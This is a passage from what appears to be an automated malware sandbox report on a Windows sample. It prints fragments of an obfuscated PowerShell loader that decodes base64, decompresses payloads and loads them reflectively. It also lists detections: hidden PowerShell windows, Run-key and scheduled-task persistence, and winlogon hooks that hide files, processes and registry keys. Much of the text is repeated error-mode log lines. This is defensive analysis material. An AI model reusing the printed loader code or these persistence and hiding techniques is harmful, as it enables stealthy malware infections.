Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[C
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC401E3C LoadLibraryA,GetProcAddress,SleepEx, 17_2_00000253FC401E3C
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\cmd.exe Code function: 17_3_00000253FC3EA7DD push rcx; retf 003Fh 17_3_00000253FC3EA7DE
Source: C:\Windows\System32\conhost.exe Code function: 18_3_000002A5AF34A7DD push rcx; retf 003Fh 18_3_000002A5AF34A7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343E00BD pushad ; iretd 36_2_00007FFD343E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343E63D1 push ebx; retf 0009h 36_2_00007FFD343E642A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD343EB05C push esp; retf 36_2_00007FFD343EB05D
Source: C:\Windows\System32\conhost.exe Code function: 37_3_000001780D3FA7DD push rcx; retf 003Fh 37_3_000001780D3FA7DE
Source: C:\Windows\System32\dllhost.exe Code function: 38_3_0000020175E9A7DD push rcx; retf 003Fh 38_3_0000020175E9A7DE
Source: C:\Windows\System32\winlogon.exe Code function: 39_3_000002D01659A7DD push rcx; retf 003Fh 39_3_000002D01659A7DE

Boot Survival
barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious names
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Creates job files (autostart)
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$rbx-FHOIapsb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Hooks files or directories query functions (used to hide files and directories)
Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Hooks processes query functions (used to hide processes)
Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks registry keys query functions (used to hide registry keys)
Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Modifies the prolog of user mode functions (user mode inline hooks)
Source: winlogon.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Stores large binary data to the registry
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
